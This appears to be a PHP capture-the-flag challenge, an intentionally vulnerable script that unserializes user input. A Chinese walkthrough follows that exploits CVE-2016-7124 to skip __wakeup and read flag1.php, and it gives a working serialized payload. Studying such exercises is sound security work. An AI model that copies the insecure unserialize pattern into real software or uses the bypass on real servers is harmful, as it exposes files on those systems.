<?php
class SoFun
{
    // Name of the file (relative to this script's directory) that
    // __destruct() will print with show_source().
    protected $file = 'index.php';

    /**
     * Prints the source of $file at object destruction.
     *
     * Only a bare file name is accepted: any '\' or '/' aborts with
     * "Wrong filename." so the path cannot leave dirname(__FILE__).
     * An empty $file is a no-op. The filter does not stop reading other
     * files that live next to this script (e.g. flag1.php).
     */
    function __destruct()
    {
        if (empty($this->file)) {
            return;
        }
        // strpbrk() returns false only when neither separator occurs.
        if (strpbrk($this->file, "\\/") !== false) {
            die('Wrong filename.');
        }
        show_source(dirname(__FILE__) . '/' . $this->file);
    }

    /**
     * Reset $file after unserialize() so a crafted payload cannot choose
     * the file that __destruct() prints.
     *
     * NOTE(security): on PHP < 5.6.25 / < 7.0.10 (CVE-2016-7124) __wakeup()
     * is skipped when the property count declared in the serialized string
     * is larger than the number of properties actually present, which
     * defeats this reset.
     */
    function __wakeup()
    {
        $this->file = 'index.php';
    }

    /** Lets `echo unserialize(...)` print nothing for a SoFun instance. */
    public function __toString()
    {
        return '';
    }
}
if (isset($_GET['file'])) {
    // SECURITY: unserialize() runs on attacker-controlled input, so every
    // class with magic methods (here SoFun::__destruct) becomes reachable.
    // This is the intended weak point of the challenge; real code would use
    // unserialize($data, ['allowed_classes' => false]) or json_decode().
    $file = base64_decode($_GET['file']);
    echo unserialize($file);
} else {
    show_source('index.php');
}
// Prints O:5:"SoFun":1:{s:7:"\0*\0file";s:9:"index.php";} — the protected
// property name carries a NUL byte on each side of '*' that a browser
// does not display.
echo serialize(new SoFun());
?>
绕过方法：受保护属性 file 在序列化串中的真实名字是 \0*\0file（* 前后各有一个不可见的空字节，URL 编码为 %00，所以 s:7 的长度已把这两个字节算在内），直接复制浏览器输出会把它们丢掉。先把 index.php 改为 flag1.php，再用 Burp Suite（或十六进制编辑器）在 O:5:"SoFun":1:{s:7:"*file";s:9:"flag1.php";} 的 * 号前后各插入一个 0x00 字节，最后把整个串 base64 编码后作为 file 参数提交。
因为在 PHP < 5.6.25 / < 7.0.10（CVE-2016-7124）中，当序列化串里声明的成员个数大于实际存在的成员个数时，反序列化不会调用 __wakeup，file 就不会被重置为 index.php；随后对象析构时 __destruct 会用 show_source 把 flag1.php 打印出来。已修复版本的 PHP 不受此影响。
payload（成员个数从 1 改为 2；下面的 * 前后同样必须带上 %00 两个字节）:
O:5:"SoFun":2:{s:7:"*file";s:9:"flag1.php";}
